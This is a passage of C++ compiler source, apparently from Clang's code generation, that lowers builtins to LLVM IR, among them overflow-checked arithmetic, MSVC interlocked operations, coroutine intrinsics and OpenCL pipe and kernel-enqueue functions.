case Builtin::BI__builtin_subcb:
case Builtin::BI__builtin_subcs:
case Builtin::BI__builtin_subc:
case Builtin::BI__builtin_subcl:
case Builtin::BI__builtin_subcll: {
// We translate all of these builtins from expressions of the form:
// int x = ..., y = ..., carryin = ..., carryout, result;
// result = __builtin_addc(x, y, carryin, &carryout);
//
// to LLVM IR of the form:
//
// %tmp1 = call {i32, i1} @llvm.uadd.with.overflow.i32(i32 %x, i32 %y)
// %tmpsum1 = extractvalue {i32, i1} %tmp1, 0
// %carry1 = extractvalue {i32, i1} %tmp1, 1
// %tmp2 = call {i32, i1} @llvm.uadd.with.overflow.i32(i32 %tmpsum1,
// i32 %carryin)
// %result = extractvalue {i32, i1} %tmp2, 0
// %carry2 = extractvalue {i32, i1} %tmp2, 1
// %tmp3 = or i1 %carry1, %carry2
// %tmp4 = zext i1 %tmp3 to i32
// store i32 %tmp4, i32* %carryout
// Scalarize our inputs.
llvm::Value *X = EmitScalarExpr(E->getArg(0));
llvm::Value *Y = EmitScalarExpr(E->getArg(1));
llvm::Value *Carryin = EmitScalarExpr(E->getArg(2));
Address CarryOutPtr = EmitPointerWithAlignment(E->getArg(3));
// Decide if we are lowering to a uadd.with.overflow or usub.with.overflow.
llvm::Intrinsic::ID IntrinsicId;
switch (BuiltinID) {
default: llvm_unreachable("Unknown multiprecision builtin id.");
case Builtin::BI__builtin_addcb:
case Builtin::BI__builtin_addcs:
case Builtin::BI__builtin_addc:
case Builtin::BI__builtin_addcl:
case Builtin::BI__builtin_addcll:
IntrinsicId = llvm::Intrinsic::uadd_with_overflow;
break;
case Builtin::BI__builtin_subcb:
case Builtin::BI__builtin_subcs:
case Builtin::BI__builtin_subc:
case Builtin::BI__builtin_subcl:
case Builtin::BI__builtin_subcll:
IntrinsicId = llvm::Intrinsic::usub_with_overflow;
break;
}
// Construct our resulting LLVM IR expression.
llvm::Value *Carry1;
llvm::Value *Sum1 = EmitOverflowIntrinsic(*this, IntrinsicId,
X, Y, Carry1);
llvm::Value *Carry2;
llvm::Value *Sum2 = EmitOverflowIntrinsic(*this, IntrinsicId,
Sum1, Carryin, Carry2);
llvm::Value *CarryOut = Builder.CreateZExt(Builder.CreateOr(Carry1, Carry2),
X->getType());
Builder.CreateStore(CarryOut, CarryOutPtr);
return RValue::get(Sum2);
}
case Builtin::BI__builtin_add_overflow:
case Builtin::BI__builtin_sub_overflow:
case Builtin::BI__builtin_mul_overflow: {
const clang::Expr *LeftArg = E->getArg(0);
const clang::Expr *RightArg = E->getArg(1);
const clang::Expr *ResultArg = E->getArg(2);
clang::QualType ResultQTy =
ResultArg->getType()->castAs<PointerType>()->getPointeeType();
WidthAndSignedness LeftInfo =
getIntegerWidthAndSignedness(CGM.getContext(), LeftArg->getType());
WidthAndSignedness RightInfo =
getIntegerWidthAndSignedness(CGM.getContext(), RightArg->getType());
WidthAndSignedness ResultInfo =
getIntegerWidthAndSignedness(CGM.getContext(), ResultQTy);
// Handle mixed-sign multiplication as a special case, because adding
// runtime or backend support for our generic irgen would be too expensive.
if (isSpecialMixedSignMultiply(BuiltinID, LeftInfo, RightInfo, ResultInfo))
return EmitCheckedMixedSignMultiply(*this, LeftArg, LeftInfo, RightArg,
RightInfo, ResultArg, ResultQTy,
ResultInfo);
if (isSpecialUnsignedMultiplySignedResult(BuiltinID, LeftInfo, RightInfo,
ResultInfo))
return EmitCheckedUnsignedMultiplySignedResult(
*this, LeftArg, LeftInfo, RightArg, RightInfo, ResultArg, ResultQTy,
ResultInfo);
WidthAndSignedness EncompassingInfo =
EncompassingIntegerType({LeftInfo, RightInfo, ResultInfo});
llvm::Type *EncompassingLLVMTy =
llvm::IntegerType::get(CGM.getLLVMContext(), EncompassingInfo.Width);
llvm::Type *ResultLLVMTy = CGM.getTypes().ConvertType(ResultQTy);
llvm::Intrinsic::ID IntrinsicId;
switch (BuiltinID) {
default:
llvm_unreachable("Unknown overflow builtin id.");
case Builtin::BI__builtin_add_overflow:
IntrinsicId = EncompassingInfo.Signed
? llvm::Intrinsic::sadd_with_overflow
: llvm::Intrinsic::uadd_with_overflow;
break;
case Builtin::BI__builtin_sub_overflow:
IntrinsicId = EncompassingInfo.Signed
? llvm::Intrinsic::ssub_with_overflow
: llvm::Intrinsic::usub_with_overflow;
break;
case Builtin::BI__builtin_mul_overflow:
IntrinsicId = EncompassingInfo.Signed
? llvm::Intrinsic::smul_with_overflow
: llvm::Intrinsic::umul_with_overflow;
break;
}
llvm::Value *Left = EmitScalarExpr(LeftArg);
llvm::Value *Right = EmitScalarExpr(RightArg);
Address ResultPtr = EmitPointerWithAlignment(ResultArg);
// Extend each operand to the encompassing type.
Left = Builder.CreateIntCast(Left, EncompassingLLVMTy, LeftInfo.Signed);
Right = Builder.CreateIntCast(Right, EncompassingLLVMTy, RightInfo.Signed);
// Perform the operation on the extended values.
llvm::Value *Overflow, *Result;
Result = EmitOverflowIntrinsic(*this, IntrinsicId, Left, Right, Overflow);
if (EncompassingInfo.Width > ResultInfo.Width) {
// The encompassing type is wider than the result type, so we need to
// truncate it.
llvm::Value *ResultTrunc = Builder.CreateTrunc(Result, ResultLLVMTy);
// To see if the truncation caused an overflow, we will extend
// the result and then compare it to the original result.
llvm::Value *ResultTruncExt = Builder.CreateIntCast(
ResultTrunc, EncompassingLLVMTy, ResultInfo.Signed);
llvm::Value *TruncationOverflow =
Builder.CreateICmpNE(Result, ResultTruncExt);
Overflow = Builder.CreateOr(Overflow, TruncationOverflow);
Result = ResultTrunc;
}
// Finally, store the result using the pointer.
bool isVolatile =
ResultArg->getType()->getPointeeType().isVolatileQualified();
Builder.CreateStore(EmitToMemory(Result, ResultQTy), ResultPtr, isVolatile);
return RValue::get(Overflow);
}
case Builtin::BI__builtin_uadd_overflow:
case Builtin::BI__builtin_uaddl_overflow:
case Builtin::BI__builtin_uaddll_overflow:
case Builtin::BI__builtin_usub_overflow:
case Builtin::BI__builtin_usubl_overflow:
case Builtin::BI__builtin_usubll_overflow:
case Builtin::BI__builtin_umul_overflow:
case Builtin::BI__builtin_umull_overflow:
case Builtin::BI__builtin_umulll_overflow:
case Builtin::BI__builtin_sadd_overflow:
case Builtin::BI__builtin_saddl_overflow:
case Builtin::BI__builtin_saddll_overflow:
case Builtin::BI__builtin_ssub_overflow:
case Builtin::BI__builtin_ssubl_overflow:
case Builtin::BI__builtin_ssubll_overflow:
case Builtin::BI__builtin_smul_overflow:
case Builtin::BI__builtin_smull_overflow:
case Builtin::BI__builtin_smulll_overflow: {
// We translate all of these builtins directly to the relevant llvm IR node.
// Scalarize our inputs.
llvm::Value *X = EmitScalarExpr(E->getArg(0));
llvm::Value *Y = EmitScalarExpr(E->getArg(1));
Address SumOutPtr = EmitPointerWithAlignment(E->getArg(2));
// Decide which of the overflow intrinsics we are lowering to:
llvm::Intrinsic::ID IntrinsicId;
switch (BuiltinID) {
default: llvm_unreachable("Unknown overflow builtin id.");
case Builtin::BI__builtin_uadd_overflow:
case Builtin::BI__builtin_uaddl_overflow:
case Builtin::BI__builtin_uaddll_overflow:
IntrinsicId = llvm::Intrinsic::uadd_with_overflow;
break;
case Builtin::BI__builtin_usub_overflow:
case Builtin::BI__builtin_usubl_overflow:
case Builtin::BI__builtin_usubll_overflow:
IntrinsicId = llvm::Intrinsic::usub_with_overflow;
break;
case Builtin::BI__builtin_umul_overflow:
case Builtin::BI__builtin_umull_overflow:
case Builtin::BI__builtin_umulll_overflow:
IntrinsicId = llvm::Intrinsic::umul_with_overflow;
break;
case Builtin::BI__builtin_sadd_overflow:
case Builtin::BI__builtin_saddl_overflow:
case Builtin::BI__builtin_saddll_overflow:
IntrinsicId = llvm::Intrinsic::sadd_with_overflow;
break;
case Builtin::BI__builtin_ssub_overflow:
case Builtin::BI__builtin_ssubl_overflow:
case Builtin::BI__builtin_ssubll_overflow:
IntrinsicId = llvm::Intrinsic::ssub_with_overflow;
break;
case Builtin::BI__builtin_smul_overflow:
case Builtin::BI__builtin_smull_overflow:
case Builtin::BI__builtin_smulll_overflow:
IntrinsicId = llvm::Intrinsic::smul_with_overflow;
break;
}
llvm::Value *Carry;
llvm::Value *Sum = EmitOverflowIntrinsic(*this, IntrinsicId, X, Y, Carry);
Builder.CreateStore(Sum, SumOutPtr);
return RValue::get(Carry);
}
case Builtin::BI__builtin_addressof:
return RValue::get(EmitLValue(E->getArg(0)).getPointer(*this));
case Builtin::BI__builtin_operator_new:
return EmitBuiltinNewDeleteCall(
E->getCallee()->getType()->castAs<FunctionProtoType>(), E, false);
case Builtin::BI__builtin_operator_delete:
return EmitBuiltinNewDeleteCall(
E->getCallee()->getType()->castAs<FunctionProtoType>(), E, true);
case Builtin::BI__builtin_is_aligned:
return EmitBuiltinIsAligned(E);
case Builtin::BI__builtin_align_up:
return EmitBuiltinAlignTo(E, true);
case Builtin::BI__builtin_align_down:
return EmitBuiltinAlignTo(E, false);
case Builtin::BI__noop:
// __noop always evaluates to an integer literal zero.
return RValue::get(ConstantInt::get(IntTy, 0));
case Builtin::BI__builtin_call_with_static_chain: {
const CallExpr *Call = cast<CallExpr>(E->getArg(0));
const Expr *Chain = E->getArg(1);
return EmitCall(Call->getCallee()->getType(),
EmitCallee(Call->getCallee()), Call, ReturnValue,
EmitScalarExpr(Chain));
}
case Builtin::BI_InterlockedExchange8:
case Builtin::BI_InterlockedExchange16:
case Builtin::BI_InterlockedExchange:
case Builtin::BI_InterlockedExchangePointer:
return RValue::get(
EmitMSVCBuiltinExpr(MSVCIntrin::_InterlockedExchange, E));
case Builtin::BI_InterlockedCompareExchangePointer:
case Builtin::BI_InterlockedCompareExchangePointer_nf: {
llvm::Type *RTy;
llvm::IntegerType *IntType =
IntegerType::get(getLLVMContext(),
getContext().getTypeSize(E->getType()));
llvm::Type *IntPtrType = IntType->getPointerTo();
llvm::Value *Destination =
Builder.CreateBitCast(EmitScalarExpr(E->getArg(0)), IntPtrType);
llvm::Value *Exchange = EmitScalarExpr(E->getArg(1));
RTy = Exchange->getType();
Exchange = Builder.CreatePtrToInt(Exchange, IntType);
llvm::Value *Comparand =
Builder.CreatePtrToInt(EmitScalarExpr(E->getArg(2)), IntType);
auto Ordering =
BuiltinID == Builtin::BI_InterlockedCompareExchangePointer_nf ?
AtomicOrdering::Monotonic : AtomicOrdering::SequentiallyConsistent;
auto Result = Builder.CreateAtomicCmpXchg(Destination, Comparand, Exchange,
Ordering, Ordering);
Result->setVolatile(true);
return RValue::get(Builder.CreateIntToPtr(Builder.CreateExtractValue(Result,
0),
RTy));
}
case Builtin::BI_InterlockedCompareExchange8:
case Builtin::BI_InterlockedCompareExchange16:
case Builtin::BI_InterlockedCompareExchange:
case Builtin::BI_InterlockedCompareExchange64:
return RValue::get(EmitAtomicCmpXchgForMSIntrin(*this, E));
case Builtin::BI_InterlockedIncrement16:
case Builtin::BI_InterlockedIncrement:
return RValue::get(
EmitMSVCBuiltinExpr(MSVCIntrin::_InterlockedIncrement, E));
case Builtin::BI_InterlockedDecrement16:
case Builtin::BI_InterlockedDecrement:
return RValue::get(
EmitMSVCBuiltinExpr(MSVCIntrin::_InterlockedDecrement, E));
case Builtin::BI_InterlockedAnd8:
case Builtin::BI_InterlockedAnd16:
case Builtin::BI_InterlockedAnd:
return RValue::get(EmitMSVCBuiltinExpr(MSVCIntrin::_InterlockedAnd, E));
case Builtin::BI_InterlockedExchangeAdd8:
case Builtin::BI_InterlockedExchangeAdd16:
case Builtin::BI_InterlockedExchangeAdd:
return RValue::get(
EmitMSVCBuiltinExpr(MSVCIntrin::_InterlockedExchangeAdd, E));
case Builtin::BI_InterlockedExchangeSub8:
case Builtin::BI_InterlockedExchangeSub16:
case Builtin::BI_InterlockedExchangeSub:
return RValue::get(
EmitMSVCBuiltinExpr(MSVCIntrin::_InterlockedExchangeSub, E));
case Builtin::BI_InterlockedOr8:
case Builtin::BI_InterlockedOr16:
case Builtin::BI_InterlockedOr:
return RValue::get(EmitMSVCBuiltinExpr(MSVCIntrin::_InterlockedOr, E));
case Builtin::BI_InterlockedXor8:
case Builtin::BI_InterlockedXor16:
case Builtin::BI_InterlockedXor:
return RValue::get(EmitMSVCBuiltinExpr(MSVCIntrin::_InterlockedXor, E));
case Builtin::BI_bittest64:
case Builtin::BI_bittest:
case Builtin::BI_bittestandcomplement64:
case Builtin::BI_bittestandcomplement:
case Builtin::BI_bittestandreset64:
case Builtin::BI_bittestandreset:
case Builtin::BI_bittestandset64:
case Builtin::BI_bittestandset:
case Builtin::BI_interlockedbittestandreset:
case Builtin::BI_interlockedbittestandreset64:
case Builtin::BI_interlockedbittestandset64:
case Builtin::BI_interlockedbittestandset:
case Builtin::BI_interlockedbittestandset_acq:
case Builtin::BI_interlockedbittestandset_rel:
case Builtin::BI_interlockedbittestandset_nf:
case Builtin::BI_interlockedbittestandreset_acq:
case Builtin::BI_interlockedbittestandreset_rel:
case Builtin::BI_interlockedbittestandreset_nf:
return RValue::get(EmitBitTestIntrinsic(*this, BuiltinID, E));
// These builtins exist to emit regular volatile loads and stores not
// affected by the -fms-volatile setting.
case Builtin::BI__iso_volatile_load8:
case Builtin::BI__iso_volatile_load16:
case Builtin::BI__iso_volatile_load32:
case Builtin::BI__iso_volatile_load64:
return RValue::get(EmitISOVolatileLoad(*this, E));
case Builtin::BI__iso_volatile_store8:
case Builtin::BI__iso_volatile_store16:
case Builtin::BI__iso_volatile_store32:
case Builtin::BI__iso_volatile_store64:
return RValue::get(EmitISOVolatileStore(*this, E));
case Builtin::BI__exception_code:
case Builtin::BI_exception_code:
return RValue::get(EmitSEHExceptionCode());
case Builtin::BI__exception_info:
case Builtin::BI_exception_info:
return RValue::get(EmitSEHExceptionInfo());
case Builtin::BI__abnormal_termination:
case Builtin::BI_abnormal_termination:
return RValue::get(EmitSEHAbnormalTermination());
case Builtin::BI_setjmpex:
if (getTarget().getTriple().isOSMSVCRT() && E->getNumArgs() == 1 &&
E->getArg(0)->getType()->isPointerType())
return EmitMSVCRTSetJmp(*this, MSVCSetJmpKind::_setjmpex, E);
break;
case Builtin::BI_setjmp:
if (getTarget().getTriple().isOSMSVCRT() && E->getNumArgs() == 1 &&
E->getArg(0)->getType()->isPointerType()) {
if (getTarget().getTriple().getArch() == llvm::Triple::x86)
return EmitMSVCRTSetJmp(*this, MSVCSetJmpKind::_setjmp3, E);
else if (getTarget().getTriple().getArch() == llvm::Triple::aarch64)
return EmitMSVCRTSetJmp(*this, MSVCSetJmpKind::_setjmpex, E);
return EmitMSVCRTSetJmp(*this, MSVCSetJmpKind::_setjmp, E);
}
break;
case Builtin::BI__GetExceptionInfo: {
if (llvm::GlobalVariable *GV =
CGM.getCXXABI().getThrowInfo(FD->getParamDecl(0)->getType()))
return RValue::get(llvm::ConstantExpr::getBitCast(GV, CGM.Int8PtrTy));
break;
}
case Builtin::BI__fastfail:
return RValue::get(EmitMSVCBuiltinExpr(MSVCIntrin::__fastfail, E));
case Builtin::BI__builtin_coro_size: {
auto & Context = getContext();
auto SizeTy = Context.getSizeType();
auto T = Builder.getIntNTy(Context.getTypeSize(SizeTy));
Function *F = CGM.getIntrinsic(Intrinsic::coro_size, T);
return RValue::get(Builder.CreateCall(F));
}
case Builtin::BI__builtin_coro_id:
return EmitCoroutineIntrinsic(E, Intrinsic::coro_id);
case Builtin::BI__builtin_coro_promise:
return EmitCoroutineIntrinsic(E, Intrinsic::coro_promise);
case Builtin::BI__builtin_coro_resume:
return EmitCoroutineIntrinsic(E, Intrinsic::coro_resume);
case Builtin::BI__builtin_coro_frame:
return EmitCoroutineIntrinsic(E, Intrinsic::coro_frame);
case Builtin::BI__builtin_coro_noop:
return EmitCoroutineIntrinsic(E, Intrinsic::coro_noop);
case Builtin::BI__builtin_coro_free:
return EmitCoroutineIntrinsic(E, Intrinsic::coro_free);
case Builtin::BI__builtin_coro_destroy:
return EmitCoroutineIntrinsic(E, Intrinsic::coro_destroy);
case Builtin::BI__builtin_coro_done:
return EmitCoroutineIntrinsic(E, Intrinsic::coro_done);
case Builtin::BI__builtin_coro_alloc:
return EmitCoroutineIntrinsic(E, Intrinsic::coro_alloc);
case Builtin::BI__builtin_coro_begin:
return EmitCoroutineIntrinsic(E, Intrinsic::coro_begin);
case Builtin::BI__builtin_coro_end:
return EmitCoroutineIntrinsic(E, Intrinsic::coro_end);
case Builtin::BI__builtin_coro_suspend:
return EmitCoroutineIntrinsic(E, Intrinsic::coro_suspend);
case Builtin::BI__builtin_coro_param:
return EmitCoroutineIntrinsic(E, Intrinsic::coro_param);
// OpenCL v2.0 s6.13.16.2, Built-in pipe read and write functions
case Builtin::BIread_pipe:
case Builtin::BIwrite_pipe: {
Value *Arg0 = EmitScalarExpr(E->getArg(0)),
*Arg1 = EmitScalarExpr(E->getArg(1));
CGOpenCLRuntime OpenCLRT(CGM);
Value *PacketSize = OpenCLRT.getPipeElemSize(E->getArg(0));
Value *PacketAlign = OpenCLRT.getPipeElemAlign(E->getArg(0));
// Type of the generic packet parameter.
unsigned GenericAS =
getContext().getTargetAddressSpace(LangAS::opencl_generic);
llvm::Type *I8PTy = llvm::PointerType::get(
llvm::Type::getInt8Ty(getLLVMContext()), GenericAS);
// Testing which overloaded version we should generate the call for.
if (2U == E->getNumArgs()) {
const char *Name = (BuiltinID == Builtin::BIread_pipe) ? "__read_pipe_2"
: "__write_pipe_2";
// Creating a generic function type to be able to call with any builtin or
// user defined type.
llvm::Type *ArgTys[] = {Arg0->getType(), I8PTy, Int32Ty, Int32Ty};
llvm::FunctionType *FTy = llvm::FunctionType::get(
Int32Ty, llvm::ArrayRef<llvm::Type *>(ArgTys), false);
Value *BCast = Builder.CreatePointerCast(Arg1, I8PTy);
return RValue::get(
EmitRuntimeCall(CGM.CreateRuntimeFunction(FTy, Name),
{Arg0, BCast, PacketSize, PacketAlign}));
} else {
assert(4 == E->getNumArgs() &&
"Illegal number of parameters to pipe function");
const char *Name = (BuiltinID == Builtin::BIread_pipe) ? "__read_pipe_4"
: "__write_pipe_4";
llvm::Type *ArgTys[] = {Arg0->getType(), Arg1->getType(), Int32Ty, I8PTy,
Int32Ty, Int32Ty};
Value *Arg2 = EmitScalarExpr(E->getArg(2)),
*Arg3 = EmitScalarExpr(E->getArg(3));
llvm::FunctionType *FTy = llvm::FunctionType::get(
Int32Ty, llvm::ArrayRef<llvm::Type *>(ArgTys), false);
Value *BCast = Builder.CreatePointerCast(Arg3, I8PTy);
// We know the third argument is an integer type, but we may need to cast
// it to i32.
if (Arg2->getType() != Int32Ty)
Arg2 = Builder.CreateZExtOrTrunc(Arg2, Int32Ty);
return RValue::get(
EmitRuntimeCall(CGM.CreateRuntimeFunction(FTy, Name),
{Arg0, Arg1, Arg2, BCast, PacketSize, PacketAlign}));
}
}
// OpenCL v2.0 s6.13.16 ,s9.17.3.5 - Built-in pipe reserve read and write
// functions
case Builtin::BIreserve_read_pipe:
case Builtin::BIreserve_write_pipe:
case Builtin::BIwork_group_reserve_read_pipe:
case Builtin::BIwork_group_reserve_write_pipe:
case Builtin::BIsub_group_reserve_read_pipe:
case Builtin::BIsub_group_reserve_write_pipe: {
// Composing the mangled name for the function.
const char *Name;
if (BuiltinID == Builtin::BIreserve_read_pipe)
Name = "__reserve_read_pipe";
else if (BuiltinID == Builtin::BIreserve_write_pipe)
Name = "__reserve_write_pipe";
else if (BuiltinID == Builtin::BIwork_group_reserve_read_pipe)
Name = "__work_group_reserve_read_pipe";
else if (BuiltinID == Builtin::BIwork_group_reserve_write_pipe)
Name = "__work_group_reserve_write_pipe";
else if (BuiltinID == Builtin::BIsub_group_reserve_read_pipe)
Name = "__sub_group_reserve_read_pipe";
else
Name = "__sub_group_reserve_write_pipe";
Value *Arg0 = EmitScalarExpr(E->getArg(0)),
*Arg1 = EmitScalarExpr(E->getArg(1));
llvm::Type *ReservedIDTy = ConvertType(getContext().OCLReserveIDTy);
CGOpenCLRuntime OpenCLRT(CGM);
Value *PacketSize = OpenCLRT.getPipeElemSize(E->getArg(0));
Value *PacketAlign = OpenCLRT.getPipeElemAlign(E->getArg(0));
// Building the generic function prototype.
llvm::Type *ArgTys[] = {Arg0->getType(), Int32Ty, Int32Ty, Int32Ty};
llvm::FunctionType *FTy = llvm::FunctionType::get(
ReservedIDTy, llvm::ArrayRef<llvm::Type *>(ArgTys), false);
// We know the second argument is an integer type, but we may need to cast
// it to i32.
if (Arg1->getType() != Int32Ty)
Arg1 = Builder.CreateZExtOrTrunc(Arg1, Int32Ty);
return RValue::get(EmitRuntimeCall(CGM.CreateRuntimeFunction(FTy, Name),
{Arg0, Arg1, PacketSize, PacketAlign}));
}
// OpenCL v2.0 s6.13.16, s9.17.3.5 - Built-in pipe commit read and write
// functions
case Builtin::BIcommit_read_pipe:
case Builtin::BIcommit_write_pipe:
case Builtin::BIwork_group_commit_read_pipe:
case Builtin::BIwork_group_commit_write_pipe:
case Builtin::BIsub_group_commit_read_pipe:
case Builtin::BIsub_group_commit_write_pipe: {
const char *Name;
if (BuiltinID == Builtin::BIcommit_read_pipe)
Name = "__commit_read_pipe";
else if (BuiltinID == Builtin::BIcommit_write_pipe)
Name = "__commit_write_pipe";
else if (BuiltinID == Builtin::BIwork_group_commit_read_pipe)
Name = "__work_group_commit_read_pipe";
else if (BuiltinID == Builtin::BIwork_group_commit_write_pipe)
Name = "__work_group_commit_write_pipe";
else if (BuiltinID == Builtin::BIsub_group_commit_read_pipe)
Name = "__sub_group_commit_read_pipe";
else
Name = "__sub_group_commit_write_pipe";
Value *Arg0 = EmitScalarExpr(E->getArg(0)),
*Arg1 = EmitScalarExpr(E->getArg(1));
CGOpenCLRuntime OpenCLRT(CGM);
Value *PacketSize = OpenCLRT.getPipeElemSize(E->getArg(0));
Value *PacketAlign = OpenCLRT.getPipeElemAlign(E->getArg(0));
// Building the generic function prototype.
llvm::Type *ArgTys[] = {Arg0->getType(), Arg1->getType(), Int32Ty, Int32Ty};
llvm::FunctionType *FTy =
llvm::FunctionType::get(llvm::Type::getVoidTy(getLLVMContext()),
llvm::ArrayRef<llvm::Type *>(ArgTys), false);
return RValue::get(EmitRuntimeCall(CGM.CreateRuntimeFunction(FTy, Name),
{Arg0, Arg1, PacketSize, PacketAlign}));
}
// OpenCL v2.0 s6.13.16.4 Built-in pipe query functions
case Builtin::BIget_pipe_num_packets:
case Builtin::BIget_pipe_max_packets: {
const char *BaseName;
const auto *PipeTy = E->getArg(0)->getType()->castAs<PipeType>();
if (BuiltinID == Builtin::BIget_pipe_num_packets)
BaseName = "__get_pipe_num_packets";
else
BaseName = "__get_pipe_max_packets";
std::string Name = std::string(BaseName) +
std::string(PipeTy->isReadOnly() ? "_ro" : "_wo");
// Building the generic function prototype.
Value *Arg0 = EmitScalarExpr(E->getArg(0));
CGOpenCLRuntime OpenCLRT(CGM);
Value *PacketSize = OpenCLRT.getPipeElemSize(E->getArg(0));
Value *PacketAlign = OpenCLRT.getPipeElemAlign(E->getArg(0));
llvm::Type *ArgTys[] = {Arg0->getType(), Int32Ty, Int32Ty};
llvm::FunctionType *FTy = llvm::FunctionType::get(
Int32Ty, llvm::ArrayRef<llvm::Type *>(ArgTys), false);
return RValue::get(EmitRuntimeCall(CGM.CreateRuntimeFunction(FTy, Name),
{Arg0, PacketSize, PacketAlign}));
}
// OpenCL v2.0 s6.13.9 - Address space qualifier functions.
case Builtin::BIto_global:
case Builtin::BIto_local:
case Builtin::BIto_private: {
auto Arg0 = EmitScalarExpr(E->getArg(0));
auto NewArgT = llvm::PointerType::get(Int8Ty,
CGM.getContext().getTargetAddressSpace(LangAS::opencl_generic));
auto NewRetT = llvm::PointerType::get(Int8Ty,
CGM.getContext().getTargetAddressSpace(
E->getType()->getPointeeType().getAddressSpace()));
auto FTy = llvm::FunctionType::get(NewRetT, {NewArgT}, false);
llvm::Value *NewArg;
if (Arg0->getType()->getPointerAddressSpace() !=
NewArgT->getPointerAddressSpace())
NewArg = Builder.CreateAddrSpaceCast(Arg0, NewArgT);
else
NewArg = Builder.CreateBitOrPointerCast(Arg0, NewArgT);
auto NewName = std::string("__") + E->getDirectCallee()->getName().str();
auto NewCall =
EmitRuntimeCall(CGM.CreateRuntimeFunction(FTy, NewName), {NewArg});
return RValue::get(Builder.CreateBitOrPointerCast(NewCall,
ConvertType(E->getType())));
}
// OpenCL v2.0, s6.13.17 - Enqueue kernel function.
// It contains four different overload formats specified in Table 6.13.17.1.
case Builtin::BIenqueue_kernel: {
StringRef Name; // Generated function call name
unsigned NumArgs = E->getNumArgs();
llvm::Type *QueueTy = ConvertType(getContext().OCLQueueTy);
llvm::Type *GenericVoidPtrTy = Builder.getInt8PtrTy(
getContext().getTargetAddressSpace(LangAS::opencl_generic));
llvm::Value *Queue = EmitScalarExpr(E->getArg(0));
llvm::Value *Flags = EmitScalarExpr(E->getArg(1));
LValue NDRangeL = EmitAggExprToLValue(E->getArg(2));
llvm::Value *Range = NDRangeL.getAddress(*this).getPointer();
llvm::Type *RangeTy = NDRangeL.getAddress(*this).getType();
if (NumArgs == 4) {
// The most basic form of the call with parameters:
// queue_t, kernel_enqueue_flags_t, ndrange_t, block(void)
Name = "__enqueue_kernel_basic";
llvm::Type *ArgTys[] = {QueueTy, Int32Ty, RangeTy, GenericVoidPtrTy,
GenericVoidPtrTy};
llvm::FunctionType *FTy = llvm::FunctionType::get(
Int32Ty, llvm::ArrayRef<llvm::Type *>(ArgTys), false);
auto Info =
CGM.getOpenCLRuntime().emitOpenCLEnqueuedBlock(*this, E->getArg(3));
llvm::Value *Kernel =
Builder.CreatePointerCast(Info.Kernel, GenericVoidPtrTy);
llvm::Value *Block =
Builder.CreatePointerCast(Info.BlockArg, GenericVoidPtrTy);
AttrBuilder B;
B.addByValAttr(NDRangeL.getAddress(*this).getElementType());
llvm::AttributeList ByValAttrSet =
llvm::AttributeList::get(CGM.getModule().getContext(), 3U, B);
auto RTCall =
EmitRuntimeCall(CGM.CreateRuntimeFunction(FTy, Name, ByValAttrSet),
{Queue, Flags, Range, Kernel, Block});
RTCall->setAttributes(ByValAttrSet);
return RValue::get(RTCall);
}
assert(NumArgs >= 5 && "Invalid enqueue_kernel signature");
// Create a temporary array to hold the sizes of local pointer arguments
// for the block. \p First is the position of the first size argument.
auto CreateArrayForSizeVar = [=](unsigned First)
-> std::tuple<llvm::Value *, llvm::Value *, llvm::Value *> {
llvm::APInt ArraySize(32, NumArgs - First);
QualType SizeArrayTy = getContext().getConstantArrayType(
getContext().getSizeType(), ArraySize, nullptr, ArrayType::Normal,
/*IndexTypeQuals=*/0);
auto Tmp = CreateMemTemp(SizeArrayTy, "block_sizes");
llvm::Value *TmpPtr = Tmp.getPointer();
llvm::Value *TmpSize = EmitLifetimeStart(
CGM.getDataLayout().getTypeAllocSize(Tmp.getElementType()), TmpPtr);
llvm::Value *ElemPtr;
// Each of the following arguments specifies the size of the corresponding
// argument passed to the enqueued block.
auto *Zero = llvm::ConstantInt::get(IntTy, 0);
for (unsigned I = First; I < NumArgs; ++I) {
auto *Index = llvm::ConstantInt::get(IntTy, I - First);
auto *GEP = Builder.CreateGEP(Tmp.getElementType(), TmpPtr,
{Zero, Index});
if (I == First)
ElemPtr = GEP;
auto *V =
Builder.CreateZExtOrTrunc(EmitScalarExpr(E->getArg(I)), SizeTy);
Builder.CreateAlignedStore(
V, GEP, CGM.getDataLayout().getPrefTypeAlign(SizeTy));
}
return std::tie(ElemPtr, TmpSize, TmpPtr);
};
// Could have events and/or varargs.
if (E->getArg(3)->getType()->isBlockPointerType()) {
// No events passed, but has variadic arguments.
Name = "__enqueue_kernel_varargs";
auto Info =
CGM.getOpenCLRuntime().emitOpenCLEnqueuedBlock(*this, E->getArg(3));
llvm::Value *Kernel =
Builder.CreatePointerCast(Info.Kernel, GenericVoidPtrTy);
auto *Block = Builder.CreatePointerCast(Info.BlockArg, GenericVoidPtrTy);
llvm::Value *ElemPtr, *TmpSize, *TmpPtr;
std::tie(ElemPtr, TmpSize, TmpPtr) = CreateArrayForSizeVar(4);
// Create a vector of the arguments, as well as a constant value to
// express to the runtime the number of variadic arguments.
llvm::Value *const Args[] = {Queue, Flags,
Range, Kernel,
Block, ConstantInt::get(IntTy, NumArgs - 4),
ElemPtr};
llvm::Type *const ArgTys[] = {
QueueTy, IntTy, RangeTy, GenericVoidPtrTy,
GenericVoidPtrTy, IntTy, ElemPtr->getType()};
llvm::FunctionType *FTy = llvm::FunctionType::get(Int32Ty, ArgTys, false);
auto Call = RValue::get(
EmitRuntimeCall(CGM.CreateRuntimeFunction(FTy, Name), Args));
if (TmpSize)
EmitLifetimeEnd(TmpSize, TmpPtr);
return Call;
}
// Any calls now have event arguments passed.
if (NumArgs >= 7) {
llvm::Type *EventTy = ConvertType(getContext().OCLClkEventTy);
llvm::PointerType *EventPtrTy = EventTy->getPointerTo(
CGM.getContext().getTargetAddressSpace(LangAS::opencl_generic));
llvm::Value *NumEvents =
Builder.CreateZExtOrTrunc(EmitScalarExpr(E->getArg(3)), Int32Ty);
// Since SemaOpenCLBuiltinEnqueueKernel allows fifth and sixth arguments
// to be a null pointer constant (including `0` literal), we can take it
// into account and emit null pointer directly.
llvm::Value *EventWaitList = nullptr;
if (E->getArg(4)->isNullPointerConstant(
getContext(), Expr::NPC_ValueDependentIsNotNull)) {
EventWaitList = llvm::ConstantPointerNull::get(EventPtrTy);
} else {
EventWaitList = E->getArg(4)->getType()->isArrayType()
? EmitArrayToPointerDecay(E->getArg(4)).getPointer()
: EmitScalarExpr(E->getArg(4));
// Convert to generic address space.
EventWaitList = Builder.CreatePointerCast(EventWaitList, EventPtrTy);
}
llvm::Value *EventRet = nullptr;
if (E->getArg(5)->isNullPointerConstant(
getContext(), Expr::NPC_ValueDependentIsNotNull)) {
